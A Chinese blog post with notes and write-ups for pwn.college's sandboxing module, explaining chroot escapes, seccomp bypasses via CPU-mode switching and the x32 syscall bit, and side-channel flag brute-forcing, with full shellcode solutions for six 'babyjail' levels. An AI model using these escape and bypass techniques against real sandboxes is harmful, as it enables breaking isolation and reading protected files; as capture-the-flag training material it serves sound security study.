<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.2.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/df32.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/df16.ico">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"dreamfo1l.github.io","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="pwn.college sanboxing  Module">
<meta property="og:type" content="article">
<meta property="og:title" content="SandBoxing">
<meta property="og:url" content="https://dreamfo1l.github.io/2022/12/30/SandBoxing/index.html">
<meta property="og:site_name" content="dreamfoil">
<meta property="og:description" content="pwn.college sanboxing  Module">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2022-12-30T11:26:49.000Z">
<meta property="article:modified_time" content="2022-12-30T11:37:12.485Z">
<meta property="article:author" content="dreamfoil">
<meta property="article:tag" content="PwnCollege">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="https://dreamfo1l.github.io/2022/12/30/SandBoxing/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>SandBoxing | dreamfoil</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">dreamfoil</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://dreamfo1l.github.io/2022/12/30/SandBoxing/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="dreamfoil">
      <meta itemprop="description" content="独立之精神，自由之思想。">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="dreamfoil">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          SandBoxing
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2022-12-30 19:26:49 / 修改时间：19:37:12" itemprop="dateCreated datePublished" datetime="2022-12-30T19:26:49+08:00">2022-12-30</time>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p>pwn.college sanboxing  Module</p>
<span id="more"></span>

<h2 id="chroot"><a href="#chroot" class="headerlink" title="chroot"></a>chroot</h2><p>chroot 改变根目录，以达到隔离的状态。</p>
<h2 id="openat-linkat"><a href="#openat-linkat" class="headerlink" title="openat linkat"></a>openat linkat</h2><p>openat  linkat 等后缀为at的函数可以打开一个目录文件描述符，然后用相对路径进行操作。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="type">int</span>	<span class="title function_">open</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *path, <span class="type">int</span> oflag, ...)</span>;</span><br><span class="line"><span class="type">int</span>  <span class="title function_">openat</span><span class="params">(<span class="type">int</span> fd, <span class="type">const</span> <span class="type">char</span> *path, <span class="type">int</span> oflag, ...)</span>;</span><br><span class="line"><span class="type">int</span>  <span class="title function_">link</span><span class="params">(<span class="type">const</span> <span class="type">char</span> *path1, <span class="type">const</span> <span class="type">char</span> *path2)</span>;</span><br><span class="line"><span class="type">int</span>  <span class="title function_">linkat</span><span class="params">(<span class="type">int</span> fd1, <span class="type">const</span> <span class="type">char</span> *name1, <span class="type">int</span> fd2, <span class="type">const</span> <span class="type">char</span> *name2, <span class="type">int</span> flag)</span>;</span><br></pre></td></tr></table></figure>

<h2 id="seccomp"><a href="#seccomp" class="headerlink" title="seccomp"></a>seccomp</h2><p>参考<a target="_blank" rel="noopener" href="https://a1ex.online/2020/09/27/seccomp%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">seccomp学习笔记</a></p>
<p>seccomp 是一种内核中的安全机制，未使用seccomp时，程序可以使用所有的 syscall，通过seccomp程序可以禁用掉某些 syscall，这样就算劫持了程序流也只能调用部分 syscall了。</p>
<h3 id="绕过未检查arch"><a href="#绕过未检查arch" class="headerlink" title="绕过未检查arch"></a>绕过未检查arch</h3><p>当未检查 arch 参数时，可以尝试转换当前的处理器模式，即在32位程序中转到64位或者相反，因为<code>i386</code> 和 <code>x86-64</code> 拥有不同的系统调用号，例如程序为 <code>x86-64</code> 的并且禁止 <code>execve</code>:</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">11</span>	<span class="number">64</span>  	munmap			__x64_sys_munmap</span><br><span class="line"><span class="attribute">59</span>	<span class="number">64</span>	    execve			__x64_sys_execve/ptregs</span><br><span class="line"><span class="attribute">11</span>	i386	execve			sys_execve</span><br></pre></td></tr></table></figure>

<p>若改变模式让其认为当前正在处理 <code>i386</code> 的程序，那么系统调用号 <code>11</code> 将不会被解析为 <code>__x64_sys_munmap</code> 而是 <code>sys_execve</code> ，这样就绕过了保护。利用条件为：</p>
<figure class="highlight markdown"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="bullet">1.</span> 未检查arch</span><br><span class="line"><span class="bullet">2.</span> 调用号11未被禁止</span><br><span class="line"><span class="bullet">3.</span> sys<span class="emphasis">_mmap或sys_</span>mprotect能用</span><br></pre></td></tr></table></figure>

<p>第三点是因为要转换 CPU 的处理模式，所以在大部分情况下很难找到现成的 gadget 利用，需要手动注入shellcode 并能够执行。所以就需要一块可写可执行的内存，这个shellcode 的主要部分如下：</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="symbol">to32:</span>                           <span class="comment">;;将CPU模式转换为32位</span></span><br><span class="line">    <span class="keyword">mov</span> <span class="built_in">DWORD</span> [<span class="built_in">rsp</span>+<span class="number">4</span>],<span class="number">0x23</span>      <span class="comment">;;32位</span></span><br><span class="line">    <span class="keyword">retf</span></span><br><span class="line"><span class="symbol">to64:</span>                           <span class="comment">;;将CPU模式转换为64位</span></span><br><span class="line">    <span class="keyword">mov</span> <span class="built_in">DWORD</span> [<span class="built_in">esp</span>+<span class="number">4</span>],<span class="number">0x33</span>      <span class="comment">;;64位</span></span><br><span class="line">    <span class="keyword">retf</span></span><br></pre></td></tr></table></figure>

<p>原理是 <code>RETF</code>指令，能够改变 <code>CS</code> 寄存器，当 <code>CS</code> 为 0x23 时表示当前为 64位，当为 0x33 时表示为32位：</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">RETQ：<span class="keyword">POP</span> <span class="built_in">RIP</span>   </span><br><span class="line"><span class="symbol">RETN:</span> <span class="keyword">POP</span> <span class="built_in">EIP</span></span><br><span class="line"><span class="symbol">RETF:</span> <span class="keyword">POP</span> <span class="built_in">CS</span>:<span class="built_in">EIP</span>      </span><br></pre></td></tr></table></figure>

<h3 id="X64下使用-X32"><a href="#X64下使用-X32" class="headerlink" title="X64下使用 X32"></a>X64下使用 X32</h3><p>如果程序开启了 arch 检查，就不能转换 处理器模式了。但是 x86-64 下有一种特殊模式 X32，它使用 64位的存器地址和 32位的地址，此时 nr 会在原来基础上加上 _X32_SYSCALL_BIT (0X400000000)，即原本的 syscall number + 0x40000000，这会达到一样的效果，此时的 shellcode 效果如下：</p>
<figure class="highlight x86asm"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">section</span> .text</span><br><span class="line"><span class="meta">global</span> my_execve</span><br><span class="line"><span class="symbol"></span></span><br><span class="line"><span class="symbol">my_execve:</span></span><br><span class="line">    <span class="keyword">mov</span> <span class="built_in">rax</span>,<span class="number">59</span>+<span class="number">0x40000000</span>           <span class="comment">;;只需要把系统调用号加0x40000000即可</span></span><br><span class="line">                                    <span class="comment">;;另外520 或 520+0x40000000 也能用</span></span><br><span class="line">    <span class="keyword">syscall</span></span><br><span class="line">    <span class="keyword">nop</span></span><br><span class="line">    <span class="keyword">nop</span></span><br><span class="line">    <span class="keyword">hlt</span></span><br></pre></td></tr></table></figure>

<p>还有思路，就是考虑系统有没有没有限制到的 syscall。</p>
<h2 id="测信道爆破"><a href="#测信道爆破" class="headerlink" title="测信道爆破"></a>测信道爆破</h2><p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/ZIKH26/articles/16546513.html">测信道爆破</a></p>
<h3 id="什么是侧信道爆破？"><a href="#什么是侧信道爆破？" class="headerlink" title="什么是侧信道爆破？"></a>什么是侧信道爆破？</h3><p>侧信道攻击是一种非常有趣的攻击手法，在pwn中通常为侧信道爆破。我的理解是侧信道爆破是指在程序没有正常回显的情况下通过执行精心构造后的数据，获取一些程序的现象或反馈来确定最终正确的flag，这种反馈比如有程序回显的错误，或者死循环等等。</p>
<blockquote>
<p>  使用前提：</p>
<p>  1、侧信道爆破需要执行我们编写的shellcode(因为程序中必然无法找到全部对应的gadget)，因此能够写入和执行一定字节的shellcode是必要的</p>
<p>  2、程序在禁用了execve系统调用后，同时关闭了标准输出流后，才有必要使用侧信道爆破。</p>
<p>  3、同时<strong>标准错误不能被关闭</strong>(因为我们需要它来反馈信息)，还必须要保证read可以从指定文件中读取flag，open或者openat系统调用要保证至少有一个可用。</p>
<p>  攻击效果：在程序禁用了部分系统调用并且关闭了正常回显后，通过程序反馈的信息对进行flag逐位爆破。</p>
</blockquote>
<h3 id="侧信道爆破的整体思路"><a href="#侧信道爆破的整体思路" class="headerlink" title="侧信道爆破的整体思路:"></a>侧信道爆破的整体思路:</h3><p>首先需要想办法在程序中写入一段shellcode并且能将其执行。然后我们先执行open系统调用(如果open被禁用的话可以使用openat系统调用)，将flag文件打开返回一个文件描述符，然后用read系统调用将文件中的内容读到一片可读写的内存上，然后布置一段与flag比较的shellcode，这段shellcode的编写思路如下。</p>
<p>首先核心是用cmp指令将读入内存中的flag取一位来与我们给出的一个字符做对比，如果发现flag取的这一位与我们给出的字符一样就跳回到cmp指令处，因为字符都没变化，cmp比较后还是同样的结果，再次跳转回cmp指令处，这样无限循环程序不会有任何的回显。如果cmp比较后发现flag取一位得到的字符与我们所给的字符不同，就不进行跳转继续往下执行，我们不在后面布置任何的指令，这样程序继续往后执行，最终必然会崩溃。而我们根据程序在一定时间内是否反馈了崩溃信息来判断我们的flag是否判断正确(用je或者jz指令来实现这个跳转)</p>
<p>上面这段与flag对比的shellcode如下：</p>
<p><strong>(这段shellcode第一行并不通用，我们需要自己根据题目的情况将flag字符串的首地址放入rax，后面的三行汇编指令才是通用的)</strong> 另外汇编指令本身中的{}自然是非法的，这里所出现的{}是配合python脚本中的format方法(这个{}则是在爆破中的变量，因此需要占位符)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">mov rax,rsi</span><br><span class="line">mov bl,byte ptr [rax+&#123;&#125;]</span><br><span class="line">cmp bl,&#123;&#125;</span><br><span class="line">je $-3</span><br></pre></td></tr></table></figure>

<p>第一行就是将flag字符串的首地址给rax(这一行并不通用，根据题目自行修改)。</p>
<p>第二行将flag中的某一位取出。{}是相对于flag首地址的偏移，用来确定到底是取哪一位。通俗来将第二行的{}决定了正在爆破的是flag的哪一位。</p>
<p>第三行则将我们给出的字符与flag中的某一位进行比较</p>
<p>第四行如果cmp比较时，二者不相同就不会跳转。如果相同的话就将跳到当前指令的地址-3的位置，而cmp那个指令的机器码就是三字节，因此-3又回到了cmp执行前。由于我们给出的字符没有变，所以将无限循环下去。</p>
<p>上述的内容为核心步骤，最后整体的话需要用两个循环嵌套一下，大循环为while 1**(也就是不断循环下去，这个循环每走完一次就说明flag已经爆破出了一位)<strong>，小循环为for循环遍历我们给出flag中可能出现的字符组成的字符串</strong>(这个循环走一次就说明对flag中的某一位进行了判断，如果判断正确的话(也就是陷入了死循环)就break跳出当前循环，否则继续遍历字符串)**</p>
<h2 id="题目"><a href="#题目" class="headerlink" title="题目"></a>题目</h2><h3 id="level-1-chroot"><a href="#level-1-chroot" class="headerlink" title="level 1  chroot"></a>level 1  chroot</h3><p>题目源码</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">int</span> <span class="title">main</span><span class="params">(<span class="type">int</span> argc, <span class="type">char</span> **argv, <span class="type">char</span> **envp)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="built_in">assert</span>(argc &gt; <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;###\n&quot;</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;### Welcome to %s!\n&quot;</span>, argv[<span class="number">0</span>]);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;###\n&quot;</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">setvbuf</span>(stdin, <span class="literal">NULL</span>, _IONBF, <span class="number">0</span>);</span><br><span class="line">    <span class="built_in">setvbuf</span>(stdout, <span class="literal">NULL</span>, _IONBF, <span class="number">1</span>);</span><br><span class="line">		<span class="comment">/*puts内容略*/</span></span><br><span class="line">    <span class="built_in">assert</span>(argc &gt; <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">    <span class="type">char</span> jail_path[] = <span class="string">&quot;/tmp/jail-XXXXXX&quot;</span>;</span><br><span class="line">    <span class="built_in">assert</span>(<span class="built_in">mkdtemp</span>(jail_path) != <span class="literal">NULL</span>);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Creating a jail at `%s`.\n&quot;</span>, jail_path);</span><br><span class="line"></span><br><span class="line">    <span class="built_in">assert</span>(<span class="built_in">chroot</span>(jail_path) == <span class="number">0</span>); 					<span class="comment">//chroot</span></span><br><span class="line">														</span><br><span class="line">    <span class="type">int</span> fffd = <span class="built_in">open</span>(<span class="string">&quot;/flag&quot;</span>, O_WRONLY | O_CREAT);</span><br><span class="line">    <span class="built_in">write</span>(fffd, <span class="string">&quot;FLAG&#123;FAKE&#125;&quot;</span>, <span class="number">10</span>);						<span class="comment">//往chroot后的根目录下写一个假flag</span></span><br><span class="line">    <span class="built_in">close</span>(fffd);</span><br><span class="line">															</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Sending the file at `%s` to stdout.\n&quot;</span>, argv[<span class="number">1</span>]);</span><br><span class="line">    <span class="built_in">sendfile</span>(<span class="number">1</span>, <span class="built_in">open</span>(argv[<span class="number">1</span>], <span class="number">0</span>), <span class="number">0</span>, <span class="number">128</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>题解</p>
<p>没有进行chdir(“&#x2F;“)，实际没有进入jail</p>
<p><code> /challenge/babyjail_level1 ../../flag</code></p>
<h3 id="level-2"><a href="#level-2" class="headerlink" title="level 2"></a>level 2</h3><p>题解</p>
<p>同样没有进行chdir(“&#x2F;“)</p>
<p>openat之后用sendfile直接发到标准输出，这里0xffffff9c代表的是AT_FDCWD，即-100，也就是当前路径cwd。</p>
<p>用shellcraft生成 </p>
<p><code>openat(0xffffff9c,&quot;../../flag&quot;,0,0)</code></p>
<p><code>sendfile(1,返回的rax,0,1000)</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"></span><br><span class="line">push 0x1010101 ^ 0x6761</span><br><span class="line">xor dword ptr [rsp], 0x1010101</span><br><span class="line">mov rax, 0x6c662f2e2e2f2e2e</span><br><span class="line">push rax</span><br><span class="line">mov rsi, rsp</span><br><span class="line">xor r10d, r10d /* 0 */</span><br><span class="line">mov edi, 0xffffff9c  </span><br><span class="line">xor edx, edx /* 0 */</span><br><span class="line">/* call openat() */</span><br><span class="line">xor eax, eax</span><br><span class="line">mov ax, 0x101 /* openat */</span><br><span class="line">syscall</span><br><span class="line"></span><br><span class="line">xor r10d, r10d</span><br><span class="line">mov r10w, 0x3e8</span><br><span class="line">push 1</span><br><span class="line">pop rdi</span><br><span class="line">xor edx, edx /* 0 */</span><br><span class="line">mov rsi,rax /* openat的返回值，描述符 */</span><br><span class="line">/* call sendfile() */</span><br><span class="line">push 0x28 /* sendfile */</span><br><span class="line">pop rax</span><br><span class="line">syscall</span><br></pre></td></tr></table></figure>



<h3 id="level-3"><a href="#level-3" class="headerlink" title="level 3"></a>level 3</h3><p>执行了chdir，当前路径已经进去了。</p>
<p>程序会open我输入第一个参数，将第一个参数设置为&#x2F;根目录，open会默认返回尽可能小的描述符。</p>
<p><code>openat(3,&quot;flag&quot;,0,0) </code></p>
<p>这样表示在文件目录描述符为3的目录下，相对路径为flag，即 “&#x2F;flag”。修改上题的openat部分获得题解。</p>
<p><code>cat level3 | /challenge/babyjail_level3 /</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">.global _start</span><br><span class="line">_start:</span><br><span class="line">.intel_syntax noprefix</span><br><span class="line">    mov rax, 0x67616c66</span><br><span class="line">    push rax</span><br><span class="line">    mov rsi, rsp</span><br><span class="line">    xor r10d, r10d /* 0 */</span><br><span class="line">    mov edi, 0x3       </span><br><span class="line">    xor edx, edx /* 0 */</span><br><span class="line">    /* call openat() */</span><br><span class="line">    xor eax, eax</span><br><span class="line">    mov ax, 0x101 /* openat */</span><br><span class="line">    syscall</span><br><span class="line"></span><br><span class="line">    xor r10d, r10d</span><br><span class="line">    mov r10w, 0x3e8</span><br><span class="line">    push 1</span><br><span class="line">    pop rdi</span><br><span class="line">    xor edx, edx /* 0 */</span><br><span class="line">    mov rsi,rax /* 0 */</span><br><span class="line">    /* call sendfile() */</span><br><span class="line">    push 0x28 /* 0x28 */</span><br><span class="line">    pop rax</span><br><span class="line">    syscall</span><br><span class="line"></span><br></pre></td></tr></table></figure>



<h3 id="level-4-seccomp"><a href="#level-4-seccomp" class="headerlink" title="level 4 seccomp"></a>level 4 seccomp</h3><p>限制使用syscall </p>
<p>Allowing syscall: openat (number 257).<br>Allowing syscall: read (number 0).<br>Allowing syscall: write (number 1).<br>Allowing syscall: sendfile (number 40).</p>
<p>level3 只用了openat和sendfile。</p>
<h5 id=""><a href="#" class="headerlink" title=""></a></h5><h3 id="level-5"><a href="#level-5" class="headerlink" title="level 5"></a>level 5</h3><p>[“linkat”, “open”, “read”, “write”, “sendfile”]</p>
<p>不能使用openat</p>
<p><code>shellcraft.linkat(3,&quot;flag&quot;,0xffffff9c,&quot;flaa&quot;,0)</code></p>
<p><code>shellcraft.open(&quot;flaa&quot;,0)</code></p>
<p><code>shellcraft.sendfile(1,open的结果,0,1000)</code></p>
<p><strong>用linkat生成一个链接到当前工作目录(0xffffff9c),然后打开读取。</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">.global _start</span><br><span class="line">_start:</span><br><span class="line">.intel_syntax noprefix</span><br><span class="line">    /* linkat(fromfd=3, from=&#x27;flag&#x27;, tofd=0xffffff9c, to=&#x27;flaa&#x27;, flags=0) */</span><br><span class="line">    /* push b&#x27;flag\x00&#x27; */</span><br><span class="line">    push 0x67616c66</span><br><span class="line">    mov rsi, rsp</span><br><span class="line">    /* push b&#x27;flaa\x00&#x27; */</span><br><span class="line">    push 0x61616c66</span><br><span class="line">    mov r10, rsp</span><br><span class="line">    xor r8d, r8d /* 0 */</span><br><span class="line">    push 3</span><br><span class="line">    pop rdi</span><br><span class="line">    mov edx, 0xffffff9c</span><br><span class="line">    /* call linkat() */</span><br><span class="line">    xor eax, eax</span><br><span class="line">    mov ax, 0x109 /* SYS_linkat */</span><br><span class="line">    syscall</span><br><span class="line"></span><br><span class="line">    /* open(file=&#x27;flaa&#x27;, oflag=0, mode=0) */</span><br><span class="line">    /* push b&#x27;flaa\x00&#x27; */</span><br><span class="line">    push 0x61616c66</span><br><span class="line">    mov rdi, rsp</span><br><span class="line">    xor edx, edx /* 0 */</span><br><span class="line">    xor esi, esi /* 0 */</span><br><span class="line">    /* call open() */</span><br><span class="line">    push 0x2 /* SYS_open */</span><br><span class="line">    pop rax</span><br><span class="line">    syscall</span><br><span class="line"></span><br><span class="line">    xor r10d, r10d</span><br><span class="line">    mov r10w, 0x3e8</span><br><span class="line">    push 1</span><br><span class="line">    pop rdi</span><br><span class="line">    xor edx, edx /* 0 */</span><br><span class="line">    mov rsi,rax /* 0 */</span><br><span class="line">    /* call sendfile() */</span><br><span class="line">    push 0x28 /* 0x28 */</span><br><span class="line">    pop rax</span><br><span class="line">    syscall</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p><code>cat level5 | /challenge/babyjail_level5 /</code></p>
<h3 id="level-6"><a href="#level-6" class="headerlink" title="level 6"></a>level 6</h3><p>[“fchdir”, “open”, “read”, “write”, “sendfile”]</p>
<p><code>fchdir(fd)</code>,修改当前目录</p>
<p>shellcraft.fchdir(3)<br>    &#x2F;* fchdir(fd&#x3D;3) <em>&#x2F;<br>    push 3<br>    pop rdi<br>    &#x2F;</em> call fchdir() <em>&#x2F;<br>    push SYS_fchdir &#x2F;</em> 0x51 *&#x2F;<br>    pop rax<br>    syscall</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br></pre></td><td class="code"><pre><span class="line">.global _start</span><br><span class="line">_start:</span><br><span class="line">.intel_syntax noprefix</span><br><span class="line">    /* fchdir(fd=3) */</span><br><span class="line">    push 3</span><br><span class="line">    pop rdi</span><br><span class="line">    /* call fchdir() */</span><br><span class="line">    push  0x51 /* SYS_fchdir */</span><br><span class="line">    pop rax</span><br><span class="line">    syscall</span><br><span class="line"></span><br><span class="line">    /* open(file=&#x27;flag&#x27;, oflag=0, mode=0) */</span><br><span class="line">    /* push b&#x27;flag\x00&#x27; */</span><br><span class="line">    push 0x67616c66</span><br><span class="line">    mov rdi, rsp</span><br><span class="line">    xor edx, edx /* 0 */</span><br><span class="line">    xor esi, esi /* 0 */</span><br><span class="line">    /* call open() */</span><br><span class="line">    push 0x2 /* SYS_open */</span><br><span class="line">    pop rax</span><br><span class="line">    syscall</span><br><span class="line"></span><br><span class="line">    xor r10d, r10d</span><br><span class="line">    mov r10w, 0x3e8</span><br><span class="line">    push 1</span><br><span class="line">    pop rdi</span><br><span class="line">    xor edx, edx /* 0 */</span><br><span class="line">    mov rsi,rax /* 0 */</span><br><span class="line">    /* call sendfile() */</span><br><span class="line">    push 0x28 /* 0x28 */</span><br><span class="line">    pop rax</span><br><span class="line">    syscall</span><br><span class="line"></span><br></pre></td></tr></table></figure>

